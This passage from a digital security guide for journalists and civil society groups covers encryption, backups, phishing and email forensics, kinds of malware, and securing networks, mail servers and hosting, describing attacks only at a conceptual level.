Finally, it is important to explain end-to-end encryption, which offers an additional layer of protection. End-to-end encryption (E2EE) keeps information encrypted and private from everyone, including the provider of the online service. For example, on end-to-end encrypted messaging services, the sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it's like when you send a scrambled letter through a postal service, nobody can read your letter except you and the person to whom you sent it.

What is encryption

Disk encryption

Encryption is the process of protecting data with a complex cipher, scrambling it so that it can only be accessed (decrypted) with a password or key, sometimes requiring an additional authentication factor, e.g. a digital certificate. Encrypting hard drives and removable devices, such as USB drives, is especially recommended for people working with confidential information, primarily journalists and human rights activists, but also anyone generally working with personal data.

VeraCrypt is a multi-platform (Windows, Linux, MacOS X) free and open-source disk encryption software with advanced capabilities. It can be used to encrypt only specific files, whole hard disk partitions, removable drives, as well as a partition or drive where Windows is installed (pre-boot authentication). You can find more information on how VeraCrypt works in this tutorial.

FileVault is a MacOS utility that enables you to encrypt files on your device with your login password for an extra layer of security. In case you forget your login password, you can unlock your disk by using either your iCloud account password or a recovery key which is generated automatically when you select this option. You can find more information on how FileVault works in this tutorial.

Cryptomator enables you to encrypt your cloud storage files for services such as Dropbox or Google Drive. Files are encrypted within a secure vault which is then stored with cloud service providers, which cannot access the data. Cryptomator is open source and available for Windows, Linux, MacOS X, and mobile platforms (iOS, Android).

Data backup

Backing up does not affect the level of security of the system itself, but backup is crucial when, after a security crisis, there is a need to recover lost data. Sometimes, based on a backup, it is possible to determine the cause of the system crash by reconstructing security vulnerabilities or errors in the system. It is recommended to use an open-source backup system, such as UrBackup. When choosing, care should be taken that the backup system provides the ability to quickly and accurately restore data and that it is optimal, i.e. does not overload the server or storage resources.

A key recommendation to follow when it comes to backing up your data is the “3-2-1” rule: keep at least 3 copies of your data, make sure two copies are stored on separate devices or storage units and that one copy is stored off-site from the initial two copies, for example on a remote server.

Another important matter to take into consideration with backups is that although cloud storage providers (Proton Drive, Dropbox, Tresorit, etc.) are a common and safe solution to safely store data, they can be vulnerable to social engineering and similar attacks and do not guarantee that data will not be lost due to various reasons (e.g. Google Drive for desktop users reported losing months of data in late 2023). Taking this into account, making offline backups on an external hard drive or another computer is also encouraged as an additional precaution.

Remote working

Access to applications and data that are physically located in the system (organisation, editorial office) is possible, with appropriate permissions, from any computer in the world. In this way, work is significantly facilitated, shortens the time required for data processing, and enables participation in the fieldwork process.

From a security point of view, teleworking has serious drawbacks. Establishing a connection between the network or server in the system and the external computer opens the possibility for MitM (Man in the Middle) attacks. MitM is a type of technical attack in which the client and server are not necessarily at risk, but the attacker uses connection flaws to access their communication and commit data theft.

A secure way to work remotely is to connect via VPN (Virtual Private Network). It is a service of creating a separate tunnel between two computers on the public network, which is specially encrypted for protection one of the best VPN implementation software at the organisational level is OpenVPN.

Organisations can opt to use solutions such as Nextcloud or CryptPad in order to have access to collaborative productivity tools (documents, spreadsheets, etc.) as well as secure file storage and sharing.

Permanent data deletion

Conventional deletion of data from a device is not an effective solution for permanent deletion, because there are ways to recover deleted data with the help of special software. The solution to this are programs that use complex algorithms for decomposing data into a digital mash that can no longer be returned to its original form. Eraser is a free Windows application that can completely remove data from hard drives by overwriting it several times with carefully selected patterns.

As for optical disks (CDs, DVDs), the most elegant way to permanently destroy them is to use a special shredder that can destroy disks in addition to paper. Methods for physically destroying hard drives that can be found online, where the drive is acidified or burned, are extremely dangerous. Hard drives contain various types of harmful chemicals, which can cause toxic and flammable fumes.

If old equipment is ready for sale or a hard drive is destined for disposal, it will require deep cleaning, even if it is broken. The software that does this very efficiently is Darik’s Boot and Nuke. Good practice suggests that when disposing of old equipment - after special software has performed deep cleaning of the disks - the equipment is disassembled to destroy the ports and break the pins on the connectors.

Potential mobile threats

The security of mobile devices is becoming crucial with the rise of cyber threats directed towards smartphones and tablets. Risks include unauthorised access to sensitive data, financial losses, and other potential damages. Mobile devices, now exposed to numerous threats, often store important information such as emails, banking data, and private photos. To minimise potential harm, it is crucial to identify vulnerabilities and manage devices responsibly.

Potential digital threats that mobile devices need protection from include malicious applications and websites, often disguised as legitimate ones. Excessive app permissions of downloaded applications can compromise the privacy of our data. Phishing attacks are also prevalent through SMS messages and chat applications, as users often check and open messages in real-time, potentially missing caution at times. Data leaks often result from free applications whose business model involves selling user data to other companies. Mobile devices are not exempt from attacks by malicious software, and there are common spyware attacks on individuals in the civic sector. Caution is also advised when accessing a Wi-Fi network, as it may be fake and eavesdropped by malicious actors.

How to recognise a fake (malicious) mobile application

Even if it is noticed that an application has few reviews or very few downloads, it could be assumed to be relatively new. On the other hand, it could be a fake application designed to harm anyone who installs it.

Search the application and company on the internet: Most legitimate developers will have a website displaying all the features of the application and any other applications they have developed.
Read available app reviews: If they seem short and uninformative, it is not safe to download that application. Additionally, there may be reviews from users who have been deceived by the application.
Pay attention to details: Does the application look professional? Good design indicates a good application. Pay attention to inconsistencies in fonts, typing errors, and asymmetric placement of logos and images.
Many fake applications are copies of existing popular applications: It is useful to look at who is behind the application and whether it matches the application. Pay attention to the number of reviews - extremely popular applications will have hundreds, if not thousands, of user reviews.

Securing your mobile phone

Below you can find some advice on how to secure your mobile phone:

Password protection: Set up strong passwords for device security.
Mobile device encryption: Encrypt your device to safeguard sensitive data.
Regular data backup: Routinely backup your data to prevent loss in case of security incidents.
Be cautious of apps: Only download apps from reputable sources, and review permissions before installation and again before granting apps these permissions.
Regular app and OS updates: Keep your apps and operating system up to date to patch security vulnerabilities.
Activate the Find My Device feature: Enable the “Find My Device” feature for both Android and iPhone devices. However, be aware that this measure carries security risks as it can potentially be exploited for tracking purposes. It is advisable to carefully assess whether setting this up would be beneficial.
Logout from organisational accounts: Preferably log out after using organisational accounts.
Use a password manager: Employ a password manager for secure credential management.
Secure important files/folders: Protect crucial files and folders with passwords for added privacy.
VPN usage: Consider using a Virtual Private Network (VPN) for enhanced online security.
Log out after payments: Always log out from websites or apps after making payments.
Disable Bluetooth when unused: Turn off Bluetooth when it is not in use to minimise potential vulnerabilities.
Install a reliable antivirus: Use a reputable antivirus application to detect and thwart potential threats.
Apple has enabled the implementation of a feature called Lockdown Mode, which disables numerous functionalities but has proven to be effective in preventing attacks by advanced spyware.

Computer security

Work has transformed many professions over the last few decades, in particular when it comes to the size and mobility of computers. People are typing away at their laptops in cafes, airports, trains, and many other places where they choose or need to work. This of course leads to increased risk when it comes to devices, as they can be stolen or accessed by unauthorised people.

The primary step to ensure only you have access to your machine is to protect it with a password or a PIN, just like you would any other account. Many new laptops now offer biometric unlocking options, i.e. fingerprint readers. Although password protection doesn’t guarantee perfect security, it can throw off a malicious actor from trying to access your files.

Sharing computers at work is not as common as it used to be, but in some cases, where people work in shifts for example, it can still be the case. It is therefore important to set up separate user accounts for each person using the computer and only provide authorised personnel with an administrator account on the device. An administrator account breached by a malicious actor can be very problematic not only for the device it is located on but also for other devices in the network if the attacker manages to get enough access.

Device access

Physical security

Working and reporting from the field can be very stressful, especially when it comes to high-risk events, such as protests or demonstrations, or environments such as war or disaster zones. When you find yourself in a public place, make sure not to leave your computer unlocked or unattended, as it will be an easy target for any bad actor.

In case you frequently travel or do a lot of field work which requires you to carry your work laptop with you, strongly consider encrypting its hard drive. When the disk is encrypted, the OS installed on the hard drive cannot boot without a password. MacOS has FileVault, Windows has Bitlocker, and VeraCrypt as a third-party application also offers the system encryption option. Finally, be very careful with your devices during events that could turn violent, such as protests, as they can be stolen, damaged, or accessed by a bad actor.

Updates

Updating your software is of critical importance to make your device safe from hacking attacks and for your device to run as smoothly as possible. Even critical vulnerabilities go unnoticed and unpatched for a long time, which makes the devices a desirable target for hackers, especially if the devices hold confidential information and can be used for further attacks and other malicious activities.

Installing trusted software

In the course of work, we often find ourselves in a situation to perform a task that requires installing additional software, such as different file type converters, video downloaders, or multimedia editors. These can come in the form of browser add-ons, which may also bring vulnerabilities or be malicious themselves. In these situations, we should opt for software we can trust, i.e. which is highly rated in the community and is not publicly known for security compromises.

Tech for non-profits

Paying for licences is usually not cheap and can significantly affect the budget of a non-profit organisation. Luckily there are options to get discounted software licences or even free access to paid services:

TechSoup: This is an organisation that provides a wide catalogue of licensed software, from office suites to antivirus products, available to non-profit organisations for a discounted price. Registering with a regional TechSoup representative is required but it is not hard to get.
Proton for Business: Proton’s encrypted email solution is available at special pricing for non-profits.
Project Galileo: Cloudflare’s initiative for public interest actors (civil society, journalists, human rights activists...) provides them with DDoS website protection and other paid options free of charge.

Header analysis

A crucial step in the forensic analysis of email is examining the email header. It contains information about the message not directly displayed in the body, such as sender and recipient details, timestamp, and the route the message took before reaching its final destination.

In Gmail, Outlook, Yahoo and similar webmail interfaces, the headers can be viewed by selecting “Show original”, “View message source” or a similar option. This usually opens a new tab displaying the email header and text.

Though not all headers are present in every email, typical data found in the email header include:

From: Indicates the sender's name and address. In some cases, the address may be false or altered to conceal the sender's identity, making this field mandatory for analysis.
To: Specifies the name and address of the recipient, crucial for forensic analysis to indicate who the intended recipient is.
CC and BCC: These fields list others who received copies of the message. CC (Carbon Copy) refers to the public field, while BCC (Blind Carbon Copy) is a hidden field not visible to other recipients (and thus a BCC header is only present in the copy received by that recipient).
Date and Time: Contains the moment the message was sent, valuable in cases where timestamps serve as evidence in an investigation.
X-Mailer: Reveals the programs or platforms used to send the message and can provide information about the type of device used for sending.
Received: Lists all servers the message passed through on its journey from sender to recipient. This information can be significant for forensic analysis, aiding in the identification of sender and recipient locations, as well as identifying servers involved in sending or receiving the message – a field that is mandatory for analysis.
DKIM-Signature header: DomainKeys Identified Mail (DKIM) is a significant security standard using asymmetric encryption to ensure the email's legitimacy. It employs two sets of keys: a public key accessible to anyone receiving an email and a private key on the sender's mail server. The private key is used for encryption and the public key is for decryption.
Message-ID: This field contains a unique identifier for the message, useful in identifying the message at any stage of an investigation.

How to verify the domain in an email

Before analyzing the domain, let's first understand what comprises an email address: it consists of two parts, the username and the domain. Attackers often manipulate both the username and domain to resemble trusted sources. Among the domain manipulation methods, three are most common:

Exploiting expired domains.
Substituting the top-level domain; for instance, replacing .org with .com.
Introducing variations or misspellings:

Common misspellings: goggle.com instead of google.com.
Adding a dot or another character: go.gle.com instead of google.com.
Replacing letters with numbers: g00gle.com instead of google.com.
Using plurals or singulars interchangeably: googles.com instead of google.com.
Adding extra words: googleresults.com instead of google.com.
Substituting letters with similar or identical characters from other scripts, which may appear similar to the human eye but are read differently by computers; for example, using the letter "a" from the Latin script in place of the "a" from the Cyrillic keyboard.

Blocked IP addresses and domains lists

When an IP address from the email header's "Received" field and the domain in the email address are identified, their authenticity can be analysed using websites that maintain updated lists of blocked IP addresses and domains:

MultiRBL – provides information about the internet service provider associated with the IP addresses.
Autonomous System Lookup – offers information about the internet service provider associated with the IP addresses.
Spamhaus – combines and contains one of the most comprehensive lists of blocked IP addresses.

Body (content) analysis of the email

In addition to analysing the email header, it is crucial to examine the text of the email. The key is to determine the legitimacy of the email and verify whether it genuinely originates from the claimed sender. The goal is to establish the email's credibility.

Reviewing the body of the email involves analysing the message's content, including text, attachments, images, and links, to identify phishing elements. Typical phishing elements include fake links, requests to log in to a counterfeit page, or demands for money. Analysing links is crucial to ascertain whether they direct to fake pages.

Examining the content may also involve speech analysis, which can be useful in identifying the tone of the message and determining the emotional reactions of the sender and recipient. This analysis can be used to ascertain the intentions and motives behind sending the message.

When analysing URL addresses in an email, it's crucial to avoid accidentally clicking on the link. Instead, users should search for the original page in the internet browser and compare its URL with the link provided in the email. Numerous useful tools are available for link analysis, such as PhishTank.

Attachment analysis

The first step in this phase is to analyse the file format or its extension. Some malicious files may have additional extensions, such as .pdf.zip, or may have no extension at all. Certain extensions are often used for malicious files. However, the presence of such an extension indicates that the file might be dangerous, not necessarily that it definitely is. Here are some examples:

.zip: Commonly used for compressing and archiving files, functionality that can be exploited to mask malicious software within the file.
.exe: Indicates an executable program and may be used to install malware.
.bat: Used for batch scripts and can contain commands that execute malware.
.vbs: Used for Visual Basic scripts, which can be malicious.
.js: Known extension for JavaScript files, which may contain malicious code.
.msi: Extension for Microsoft Installer files, which can be used to install malware.
.scr: Used for screensaver files, which can be disguised as something else but actually contain malicious code.
.dll: Extension for dynamic libraries, often used for attacks on software vulnerabilities.

When analysing links and attachments, caution should be exercised to avoid accidental clicks, and it's essential to use antivirus software that detects and prevents malicious files.

Useful tools

VirusTotal allows the analysis of suspicious attachments, links, IP addresses, and domains to detect whether something is infected with malicious software. Information copied into this tool is automatically shared with the security community, so care should be taken not to copy files containing confidential information. The tool offers a premium option.

PhishTool is an automated tool for analysing potential malicious emails. Instead of individually analysing and going through all the steps mentioned, a potentially malicious email can be forwarded to PhishTool for analysis. There is an option to link the account on this service with a VirusTotal account. A free version of the PhishTool tool is also available for download and use.

Good security practices

No matter what you do online, you should always try to follow general good security practices:

Be very careful with your personal data;
Respect the privacy of others on the internet;
Only download files and install software from known and trusted sources;
Regularly update all software and operating system of your devices to reduce the risk of attacks;
Create unique and complex passwords and securely store them in password managers;
Enable multi-level authentication for your online accounts wherever possible;
Use anti-virus/anti-malware software;
Encrypt everything you can encrypt;
If you have to use a public computer, try not to leave any traces (e.g., downloaded files, account logins, browsing history) behind;
If your USB flash drive was in a public or unprotected computer, be sure to scan it with anti-virus/anti-malware software before using it again. It is generally recommended that portable devices, e.g., USB flash drives or external hard drives, are scanned each time they are connected to a computer;
Take into account the consequences of your every action on the internet; privacy does not mean less responsibility;
At least quickly read through the Terms of Use/Service before clicking "I accept".

Bad security practices

Habits are hard to change, but you should try your best to avoid these bad security practices:

Never send passwords, personal data or financial information via plain text email.
Do not access networks or other systems for which you do not have authorization, even if you have somehow obtained certain login credentials (username, password). This does not mean that you have been authorized to use them.
Do not install suspicious add-ons and software updates.
Be wary of suspicious links you received via email, no matter how interesting the message may seem. It is better to be safe than sorry.
Avoid using public or unprotected computers.
Avoid using other people's mobile devices.
Don’t write your passwords on a publicly displayed Post-it note. Seriously, don't!
Don’t use the names or dates of birth of people close to you as passwords.
Don’t leave your devices unattended and unlocked.
Don’t ignore suspicious activities - sometimes it’s better to be paranoid.
Do not use pirated software, i.e. software packages that have some type of security or product registration circumvention built in. If you do not want to pay for software, look for a free and open-source alternative.
Don't live in your comfort zone. Sometimes it is worth investing a little time and effort and learning the basics of how to be safe on the internet.

Tor and VPN

The internet commonly provides a false sense of anonymity, whereas there is only pseudo-anonymity for most users. Pretty much everyone is identifiable online by their IP address, a unique identifier assigned to you by your internet service provider (ISP).

However, there are tools that can help you mask your actual IP address and provide an additional layer of protection for your online identity. This can be achieved with the use of Tor Browser or Virtual Private Network (VPN) services.

Tor Browser is a free and open-source software customised to work with the Tor network, based on Mozilla Firefox, which encrypts your browsing traffic and the site you’re accessing from your internet provider, and hides your IP address from the website you’re visiting. It is also particularly useful for accessing blocked websites on your network. There are some drawbacks, however, as the Tor network provides generally slow internet speeds and users’ identity can be exposed if they do not use Tor Browser properly.

Virtual Private Network (VPN) is a service that enables users to connect to the public internet through a private network, providing an additional encrypted layer of privacy and masking the users’ actual IP address. Even though it helps you stay more private from the ISP and (implicitly) the government while browsing the internet, a VPN connection does not protect you from other dangers lurking online, such as malware, social engineering, or spyware. There are many VPN providers, but users should still take note and be aware of possible security aspects such as:

Jurisdiction, i.e. in which country is the company providing VPN services based. Understand the jurisdiction in which the VPN provider and their infrastructure is based and whether this poses a legal risk for you;
No logs policy, meaning that the VPN provider doesn’t log your internet traffic made through their network;
Regularly performed independent security audits, which are usually documented on the VPN provider’s website;
Price, as some VPN services can be quite expensive. Be wary of “completely free” VPN apps, though, as their business model is almost certainly based on tracking users. However, some paid service providers offer free plans with limited possibilities, such as lower speeds and a smaller number of servers.

Browser add-ons

There are ways to improve your internet browsing experience and make you safer while you use your favourite online services. Modern internet browsers, such as Mozilla Firefox, Brave, or Google Chrome, have software widgets (add-ons/extensions) that provide additional options and benefits for your browser. Here are some of the best:

Privacy Badger: An extension that enables you to block advertising trackers from third parties on websites you visit.
Facebook Container (Firefox only): It isolates your Facebook identity in a container tab, making it harder for Facebook to track your visits to other websites with third-party cookies.
uBlock Origin: A resource-friendly multi-purpose blocking extension designed to block ads, tracking, and malware domains.

What is malware

Malware (malicious software) is a general term for software used to interfere with a computer, gather sensitive information, or gain access to a protected information system. This type of software is created and used by cybercriminals and other malicious actors, even governments, to intentionally harm an information system and/or steal information from it. In some cases, the goal of malware isn’t to harm a system but to scare the person using it.

Most malware consists of one or more files and behaves like a program or an app, but there is also malware that runs entirely in memory.

Malware can be classified by how it infects systems or by what it does on the system.

Recognising malware

Different malware have different requirements for the actors behind it when it comes to avoiding detection. For example, to be successful wipers and infostealers only need to be active for a very short time, while ransomware needs to be active until all the files are encrypted, after which it clearly announces its presence on the system. On the other hand, spyware, RATs and adware need to remain hidden for a long time to be successful for their operators.

It is not always easy to recognise malware, as it often happens that users are initially unaware that their device or system is infected. Sometimes malware activity can be noticed due to spontaneous deterioration of system performance, but not all malware affects performance and certainly not every deterioration of system performance is caused by malware.

The average user certainly cannot be expected to completely remove malware on their own without the use of specific anti-malware software. These programs monitor the system, scan the files downloaded from the internet and email, and if they find any malware, they quarantine it or delete it, depending on the settings.

However, it is not enough to just install a specific application that will scan and remove malware - it is also important that users do not install untrusted applications, click on suspicious links, open suspicious emails, or visit unreliable websites.

The Classics

The most classic kind of malware is a virus, which attaches itself to existing files by making a small modification and changing the file’s behaviour. Viruses are very rare these days, but the term is sometimes used for any kind of malware.

A worm is malware that automatically spreads to other systems. Worms still exist, but they are less common than they once were.

A trojan (or trojan horse) is malware that pretends to be a legitimate program and thus tricks the user into installing or executing it. For example, cracked versions of paid software often include trojans.

Data attackers

There are a great many things a malware can do. Some of these things are very destructive, such as wipers which delete all files on a system or network or ransomware, which encrypts files and demands an often large ransom to decrypt them. Wipers are often used for political purposes, while ransomware is a very profitable operation for cybercriminals.

Command and control

A RAT (short for Remote Access Trojan) is malware that gives a rogue operator access to a system. You can think of a RAT as a kind of Teamviewer, but used for malicious purposes. The term backdoor is also used for this kind of malware, though this term is also used for remote access built into a system, either by mistake or in secret.

A downloader is malware that downloads other malware. A lot of malware infections take multiple phases, where each malware downloads the next malware until the final one does the real task. For the malware operators, this has the advantage of the malware more likely staying hidden, while also allowing to have different kinds of malware downloaded on different systems.

Finally, a collection of systems infected with the same malware and operated by a single operator is called a botnet. In that case, individual systems in the botnet are referred to as bots.

Espionage

Spyware is malware that spies on a system and thus, implicitly, on its user. Depending on the type of spyware and the device on which it runs, it can give access to someone’s private messages, microphone, or location.

An infostealer steals information from a system, such as passwords, credit cards, or cryptocurrency wallets. A keylogger steals anything typed on a keyboard.

Malvertising and scams

Adware is malware that displays ads, and closely related to that is malware that uses your computer to silently click on ads. Both are relatively harmless for the infected system, but sometimes adware is used to download more damaging malware. Moreover, the fact that adware was installed in the first place, suggests a mistake was made somewhere.

Some malware is used to engage in behaviour targeting other systems, by taking part in DDoS attacks, sending spam, or acting as proxies. The main risk for infected systems here is the use of resources, which can be costly, and the risk of the IP address ending up on blocklists.

Finally, scareware is malware that pretends to be harmful but only scares the user. For example, scareware may claim to be ransomware and demand a ransom, or claim to be a warning from the police that requires a fine to be paid.

DDoS

According to the most general classification, technical attacks can be carried out either without direct access to the server or with the need of access to the server. In the first group are mostly incidents whose most important goal is to prevent access to the content of the site.

There are several ways to crash a server, and the most commonly used is a DDoS (Distributed Denial of Service) attack. This means that a huge number of devices simultaneously send access requests to the attacked server, which cannot answer all the queries and simply stops working. After the attack stops, in most cases the server and the site work normally.

Ransomware

Ransomware is a form of malware which encrypts files on anything from a single computer all the way up to an entire network, including servers, so that the files cannot be accessed without a decryption key. The attackers then ask for payments in cryptocurrency to provide targets with the decryption key, usually within a short time frame to put more pressure on the targets. This is a very dangerous type of malware, as it can lead to critical damage to an entire information system. The system can be restored from backups, but the administrators should first check for any remaining traces of ransomware. In addition to encrypting files, the attackers can also employ data exfiltration techniques to steal data and threaten to publish them in case they don’t receive their payment.

Phishing

Phishing is focused on exploiting the lack of knowledge or gullibility of the target and is mostly done by email. It is commonly used for various scams, such as the famed “Nigerian Prince”, infecting devices with malware or gaining access to sensitive information, such as financial data or login credentials. Potential targets are sent a fraudulent message which is made to look authentic and as if it was coming from someone from the position of authority, such as a bank or police. The recipient is then asked in the email to open the attached file or click on a link in order to do something very important, e.g. to update bank account information or review a received payment.

Types of phishing emails

Phishing attacks represent a cybersecurity threat that can manifest not only through email but also through phone calls or text messages. Attackers pose as a legitimate institution or a trusted person to deceptively extract sensitive information from their potential target. This could include identity information, banking, and credit card data, or passwords for accessing protected resources through which the attacker can compromise devices and entire information systems. Phishing is often used as an introduction to various types of cyber attacks, such as ransomware attacks or the installation of spyware (malicious programs for device espionage).

There are different types of malicious emails, broadly classified into two groups: targeted phishing emails and phishing campaigns. Targeted phishing involves specifically crafted emails for specific employees of a particular organisation to obtain desired information. Phishing campaigns rely on mass distribution, with emails composed to be sent randomly to a larger number of people. Targeted phishing messages are more challenging to detect because they are carefully crafted to appear authentic, while mass-sent emails are easier to recognize due to typical characteristics. However, in both cases, email forensics is a valuable skill.

Common characteristics of a phishing email:

Typically demands urgent action.
Contains either a link or an attachment.
Inconsistency in the sender's email address with the email address of the person or organisation the attacker is impersonating.
Inconsistency in the URLs of websites and domains.
Inconsistency in the extensions of documents attached.
Requests disclosing credentials, sensitive data, personal information, credit card information, etc.

Communications interception

Interception of communication (voice, video, text chats, internet traffic) is also a risk, as there are actors such as intelligence agencies and criminals with advanced capabilities and resources to conduct surveillance of unencrypted communications channels. Issues such as government hacking are becoming increasingly dangerous for citizens’ communications privacy due to the growing surveillance industry, which keeps developing and selling one advanced product after the next.

Spyware attacks

Advanced spyware tools are increasingly used to infect smartphones of high-value targets, such as journalists, politicians, dissidents, businesspeople, etc. By leveraging vulnerabilities in mobile operating systems (iOS and Android) and apps with technically sophisticated and expensive exploits, this spyware can pull practically all data from the phone or effectively turn it into a surveillance device with remote microphone or camera activation. It is very difficult for a person to discover whether their phone is infected without a forensic analysis. Spyware products such as Pegasus and Predator have gained notoriety in recent years, but it is plausible that there are many more such tools out there.

Code injection

Code injection is a more sophisticated type of attack, when malicious code is inserted through some open form of the site or through a URL. The goal of the attack is to instigate the database or other part of the site to perform operations that have no visible result, but occupy the server's resources until they flood it with activities, thus shutting it down. In some cases, after these attacks, the site becomes unusable, so the content is restored with the last saved copy. Regular backup of the site is rightly considered an elementary security procedure.

Cross-site scripting (XSS) is used to perform an attack through vulnerable web applications, i.e. compromise regular users’ interaction with the website. The attacker prepares malicious JavaScript code which is then served to the user interacting with the website instead of what would be a regular response. If successful, the attacker can for example gain access to the user's confidential information, such as login credentials, or potentially take control of the website in case the targeted user has administrative access.

SQL injection is an attack based on interfering with queries that users can make to a website’s database (SQL is a widespread programming language for databases) in order to gain access to information stored in the database, including information which is not intended to be accessed through standard user queries, such as user personal data, login credentials and so on. The attacker targets the database with specific commands to disrupt its regular operation and receive access to stored data, which can then potentially be modified or deleted. In some cases, SQL injection can also be escalated to attack the server hosting the database.

Account hacks

Account hacks are also a common threat since social media, emails, e-banking, and other online services can hold very valuable information for the attacker. Even though an account malfunction may seem like a malware infection, it can turn out to be a hacked account. An account can be hacked through a combination of social engineering and technical skills, for example by crafting a fraudulent message which contains a demand to the user to update their login credentials for a specific service. The unsuspecting user is then redirected to a fraudulent website controlled by the attacker, which collects the user’s current login credentials for that account and locks them out. The attackers can bypass multi-factor authentication with SIM swapping (if SMS is used for multi-factor authentication) or by stealing session cookies from the user’s browser. Though the latter only gives temporary access to the account and no access to passwords, it is enough to access content. Malicious browser extensions are a common source of session hijacks.

Trojan attacks

Trojans that enter the system through social engineering are first on the list when it comes to the number of some types of attacks. Users usually pick up the infection on obscure websites where they recklessly accept the warning that they are “infected” and activate a fake antivirus. In this way, millions of hacking attacks are carried out each year, which puts the trojans in an unsurpassed advantage over other hacker attacks. The best protection against this type of attack is education and information about modern forms of threats. In organisations, this problem is somehow solved by filtering sites that can be accessed from a computer in the local network.

Data centre and cloud

Decentralisation of the system, as a measure of physical protection, is set as a key condition for its security. It is recommended that the data is not stored on the same machine from which it is sent to the network or on which it is processed. There are several ways to store large amounts of data. The simplest way is to store data on an external hard drive. External hard drives with relatively good performance are affordable, but this type of computer hardware does not have a built-in duplication mechanism. This means that in the event of a failure, most of the data on that disk would be lost forever. On the other hand, external drives do not have direct access to the internet and are active only when connected to a computer, so they can be said to be relatively secure. Storing data on an external hard drive means that the data remains in the organisation's physical headquarters.

From a data loss risk perspective, renting storage space on a cloud server is a much better way to store important data. Cloud computing is an internet technology based on the remote use of resources (data flow, storage space, working memory, etc.) and their exchange between multiple applications and users. The cloud can be private, public or hybrid. Cloud services use RAID technology (Redundant Array of Independent Disks) based on the model of comparative use of multiple disks for data storage, where each data is located in at least two locations, which significantly reduces the risk in case of failure. Some cloud storage solutions are Nextcloud, Dropbox, Proton Drive, Tresorit, etc.

The third way of storing data is to form your own mini data centre in which all data of importance to the organisation will be stored. Equipment for this purpose depends on the needs. There are a number of ready-made solutions that are cheaper and can permanently solve this issue. Thus, the data will remain within the physical space of the organisation, and the application of RAID technology will reduce the risk of data loss and theft. One of the ready-made data centre solutions is QNAP.

Internal network

In one system (company, newsroom) all computers, printers, storage devices (storage servers or mini data centres), mail servers, routers and other components are connected to the internal, local network, physically (by cable) and/or wirelessly (Wi-Fi). These networks are usually based on the so-called client-server architecture. A client or user is a computer or other hardware component in everyday use, while a server is a special computer that allows clients to use the resources stored on it. These can be applications, web pages, files, emails, databases, etc. There are different types of servers: web server, file server, mail server, database server, etc. Due to the high concentration of sensitive data in this network, special protection measures are applied to it.

A wireless network may have different physical bands depending on the strength of the transmitted signal. Indoors, this range averages about twenty metres around the router, which often means that this network is available outside the room. Routers that emit a wireless signal have several layers of protection, the configuration of which is the task of the administrator, including setting up adequate protection measures.

The most common protection measures for wireless networks:

Wireless security mode: It is recommended to use WPA2 (Wi-Fi Protected Access 2) protection which has two possible applications. PSK (Pre-Shared-Key) is set easily, by setting a password, while Enterprise requires a slightly more complicated setup and an additional RADIUS (Remote Authentication Dial In User Server) server. In most cases, the PSK method is good enough as a protection mechanism for small and medium organisations, if the password meets the standards. Many routers also support WPS (Wi-Fi Protected Setup), a system that allows you to log in to a wireless network using a button on the router, without entering a password. This system has serious security flaws, so it is recommended that it be turned off on the router;
MAC filtering: MAC address is the physical address of the device that connects to the network. The router can be configured to allow access only to addresses that are on its list. This method will not stop advanced attackers, who can detect the list of MAC addresses from the router and download some of the associated addresses for their device. It will also prevent people, including staff, from connecting new devices to the network (such as new phones), which can be inconvenient;
Hiding SSID (service set identifier): SSID is the name of a network that is usually public. Similar to the MAC filter, hiding the SSID will not stop advanced hackers, but it will prevent some less capable attackers from playing with someone else's network;
Using multiple wireless networks is recommended when there are at least two categories of people for whom the network is intended, for example employees and guests. Modern wireless routers usually have the option to create a separate guest network.

General infrastructure protection

Here are some general recommendations on infrastructure protection:

Routers can be configured to refuse automated collection of information about the system via the so-called footprinting method. This method involves creating a sketch of the network based on the fingerprint generated by sending digital signals. It should also be noted that the routing of data takes place according to different protocols, because they can be the main source of information for attackers. Mapping of routes through which data is transmitted (tracerouting), detection of active devices on the network (ping) and similar methods can reveal to the attacker the entire infrastructure, i.e. the number and type of routers, computers, and the way they are connected. Good practice dictates that ICMP requests be enabled for the web server, while the configuration for other servers and the internal network is set so that these requests are rejected;
Unnecessary server protocols should also be disabled. For example, everything can be blocked on the mail server except the protocols used for email (IMAP, POP, etc.) while web servers can be structurally configured so that access is provided only to public resources. Access to other folders and files, as well as the administrator part of the portal, should be disabled to avoid unauthorised access and data leakage;
Close unnecessary ports that no application on the server uses, with the appropriate configuration of network barriers (firewall);
By using intrusion detection systems, suspicious traffic is identified and rejected and footprinting attempts are registered;
Using anonymous registration services, information about the domain registrant can be hidden. However, it should be borne in mind that the reputation of a credible organisation is built through transparency, and this technique is not recommended in every situation.

Mail server

Emails are considered sensitive data in any organisation. Therefore, it is critical to protect the email server from attacks and other malicious activities.

In addition to the content of email, the metadata generated in everyday communication is also important - that is information generated and exchanged by software and devices used for sending and receiving emails. For attackers, metadata is often more important than the content of the letter itself, because it carries accurate information about the digital context of communication. Metadata is stored on the mail server, so its protection is specific. The basic step in this direction is to block all protocols (for example, FTP or HTTP) that the server does not need to perform its primary function, i.e. receiving and sending emails. A dedicated server can be rented as part of a hosting package or other services, or an organisation can purchase a server with special software. An example of such software is iRedMail.

Alternatively, organisations can switch to Proton for Business encrypted email solution, which offers special pricing for non-profits.

Domain

Very important aspects of organisational infrastructure management are domain name and hosting, i.e. on which server are the organisational websites hosted and which registrar they registered the domain name with.

There are numerous choices when registering a domain name (e.g. organisation.org) and it can be done relatively cheaply and easily online, depending on the needs of the organisation. Domain names are usually registered on a yearly basis and registration must be regularly renewed.

Organisations can opt for different types of top level domains, i.e. the ending part of the URL, and most common are:

Country code (ccTLD), which are associated with a specific country, region or territory: .de, .br, .ca;
Generic (gTLD), related to general notions: .com, .net, .org;
Sponsored (sTLD), reserved for specific types of registrants, such as government bodies or international organisations: .gov, .int, .aero.

When registering a domain, there is also the option of Whois domain protection, so that the registrant’s information (name, address, contacts...) wouldn’t be visible in Whois lookup searches. However, for organisations such as media, domain transparency is recommended.

Hosting

Websites can be hosted domestically, i.e. in the country where the organisation operates, or internationally. Both options are equally viable, but have some specifics to them:

Domestic hosting

Better availability of technical support that does not depend only on reporting and online communication;
Liquidity and reputation of hosting providers can be checked in the local community;
There is no application of legal provisions pertaining to international personal data transfers;
If a site targeting domestic audiences is under DDoS attack from abroad (which is usually the case) it can remain stable and accessible to domestic users by temporarily blocking foreign IP addresses.

Foreign hosting

The server where the site is hosted is outside the jurisdiction of state authorities in the organisation’s country;
